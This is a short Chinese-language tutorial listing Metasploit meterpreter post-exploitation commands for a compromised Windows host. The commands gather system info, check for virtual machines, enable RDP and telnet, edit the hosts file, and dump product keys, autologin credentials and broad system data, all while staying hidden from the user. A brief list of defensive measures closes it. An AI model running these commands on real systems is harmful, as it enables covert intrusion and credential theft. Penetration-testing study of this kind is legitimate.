后漏洞利用也就是一旦获取了系统的访问控制权,我们的关注点就在于从系统中获取尽可能多的信息,同时不能被用户发现。
比如:windows注册表转存文件,密码散列转存文件、屏幕截图、以及音频记录等。收集敏感信息,对信息进行归档。
首先我们使用meterpreter会话,保持与目标系统的连接性
1、收集操作系统信息
sysinfo
2、查看当前进程
ps
3、目标系统是否使用虚拟机
run checkvm
4、目标系统是否正在运行
idletime
5、获取目标系统环境变量
run get_env
6、目标系统的网络信息
ipconfig
7、目标系统的网络拓扑
route
8、当前目标系统的防火墙设置
run getcountermeasure
9、目标系统启用RDP远程桌面服务协议
run getgui -e
10、开启目标系统上的telnet服务协议
run gettelnet -e
11、开启目标系统上的ssh服务协议
12、修改用户的host文件
run hostsedit -e 192.168.29.133,www.51cto.com
13、当前登陆目标系统的用户
run enum_logged_on_user
14、查看已经安装的应用软件
run get_application_list
15、目标系统的驱动器信息(硬盘信息)
run windows/gather/forensics/enum_drives
16、查看目标主机的产品密钥
run windows/gather/enum_ms_product_keys
17、目标系统上的autologin特征
run windows/gather/credentials/windows_autologin
18、转存目标系统的各种信息
run winenum
19、转存目标系统的额外信息
run scraper
防御措施
1、系统补丁应该及时打上
2、来源不明的链接,文档不能轻易打开
3、提升安全意识